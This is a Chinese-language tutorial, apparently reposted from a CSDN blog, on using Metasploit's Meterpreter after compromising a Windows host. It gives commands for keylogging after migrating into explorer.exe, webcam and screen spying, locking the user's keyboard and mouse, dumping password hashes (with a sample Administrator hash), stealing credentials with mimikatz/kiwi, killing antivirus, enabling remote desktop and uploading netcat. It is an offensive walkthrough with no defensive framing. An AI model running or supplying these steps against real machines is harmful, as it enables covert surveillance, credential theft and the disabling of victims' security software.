Metapreter 详细教程--进阶教程

2023-12-29 18:08:08

常用命令

基本命令

命令说明
sysinfo查看系统信息
ls列出目录或文件夹
pwd获取当前目录地址
cd切换目录,注意这里的win系统需要用用两个反斜杠来分割(cd c:\windows\system32 )
help帮助
getuid查看当前用户是谁
getpid查看当前进程号
ps查看所有进程
background将当前会话放入后台运行
shell获取一个交互式shell
sessions列出当前可以用的会话列表同show sessions 一样
sessions -i <序号>切换到指定序号的会话到前台来
quit关闭meterpreter会话
irb获取系统配置信息的结果

sysinfo 查看系统信息
在这里插入图片描述
ls 列出当前目录
在这里插入图片描述
pwd 显示当前位置地址
在这里插入图片描述
help 帮助
在这里插入图片描述
getuid 查看当前用户
在这里插入图片描述
getpid 查看当前进程号
在这里插入图片描述
ps 查看当前所有进程
在这里插入图片描述
background 将当前会话切换到后台运行
在这里插入图片描述
sessions 列出当前可以用的会话
在这里插入图片描述
sessions -i 1 将选择的会话切换到前台来

在这里插入图片描述
quit 退出
在这里插入图片描述

文件系统命令

命令说明
mkdir创建文件夹
cat查看文件内容
rmdir删除文件夹
cp复制文件
mv移动文件或重命名文件
edit编辑或创建文件
rm删除文件
download <文件名称>下载文件
upload <文件名称>上传文件
ipconfig/ifconfig查看网络配置
search -f <文件名称(支持通配符)>搜索文件
以上命令前面加个 "l" 代表对本地系统进行操作

mkdir test 创建文件

在这里插入图片描述
edit test/test.txt 创建文件或编辑文件

在这里插入图片描述
cat test.txt 查看文件内容
在这里插入图片描述
cp test.txt test2.txt 文件复制

在这里插入图片描述
rm test2.txt 删除文件

在这里插入图片描述
search -f test* 搜索文件支持通配符
在这里插入图片描述
download test.txt 下载文件
在这里插入图片描述
upload -r /tmp/nc.txt c:/test/nc.exe 上传文件
在这里插入图片描述

用户控制和监视

命令说明
uictl enable keyboard启用键盘
uictl enable mouse启用鼠标
uictl disable keyboard禁用键盘
uictl disable mouse禁用鼠标
webcam_list查看摄像头
webcam_snap通过摄像头拍照
webcam_stream通过摄像头开启视频
run getgui -e开启远程桌面
screenshot抓屏
screenshare实时监控桌面
keyscan_start开启键盘记录
keyscan_dump导出键盘记录
keyscan_stop停止键盘记录
migrate线程迁移

screenshot 抓屏
在这里插入图片描述
在这里插入图片描述
screenshare 实时监控屏幕
在这里插入图片描述

在这里插入图片描述

键盘记录

在开启键盘记录的时候需要先确当当前的用户是谁,因为记录只会记录当前用用户

在这里插入图片描述

我们发现是system权限,但是我们要的权限是LivingOnHope的权限,这是我们需要切换到LivingOnHope的进程中去通过migrate 命令执行,这里我们选择explorer.exe进程,这个进程是windows的外壳程序(管理桌面的程序如果关闭桌面将啥也没有了)
migrate 2476
在这里插入图片描述
在这里插入图片描述
keyscan_start 开启键盘记录
keyscan_dump 下载记录内容
keyscan_stop 停止键盘记录

在这里插入图片描述
在这里插入图片描述

execute 执行文件命令

参数说明
-h帮助
-H后台运行
-i执行后与进程进行交流
-d在目标主机执行时显示的进程名称(作为装用)
-m直接从内存中运行
-a执行命令需要的参数

execute -H -i -f cmd.exe

hashdump 获取密码HASH

windows的密码文件存放路径 C:\Windows\System32\config\SAM 密码存放在SAM文件中,在老的windows系统中用的是LM 加密方式 在新的系统中如win10win11等系统都是采用NTLM加密

在这里插入图片描述

Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::
用户名称为:Administrator
RID为:500
LM-HASH值为:C8825DB10F2590EAAAD3B435B51404EE
NT-HASH值为:683020925C5D8569C23AA724774CE6CC

HASH解析网站

在这里插入图片描述

run killav 关闭杀毒软件

run kilav 关闭杀毒软件(在关闭杀毒软件的同时也会关闭cmd,这个命令可能会造成系统死机的情况)

这里因为win7没有杀毒软件所有是found
在这里插入图片描述

检测是否运行在虚拟机

run post/windows/gather/checkvm
在这里插入图片描述

枚举当前登录的用户

un post/windows/gather/enum_logged_on_users
在这里插入图片描述

mimikatz和KiWi

在msf6中mimikatz已经被kiwi所取代了,必须是system来运行

load mimikatz 将mimikatz模块加入到metapreter中(因为mimikatz已经被kiwi所替代所有输入这个命令加载的也是kiwi)

load 加载模块
在这里插入图片描述
在这里插入图片描述
creds_all 获取所有凭证(在win7及其以下的版本是可以直接获取到当前登录人输入的登录口令的,win10及其以上的版本是不能直接获取到的,只能获取到HASH密码)
在这里插入图片描述

开启远程桌面

run post/windows/manage/enable_rdp
在这里插入图片描述
rdesktop 172.30.1.133

kali 中的一个远程桌面工具
在这里插入图片描述

在这里插入图片描述

文章来源:https://blog.csdn.net/qq_41245301/article/details/135271362
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。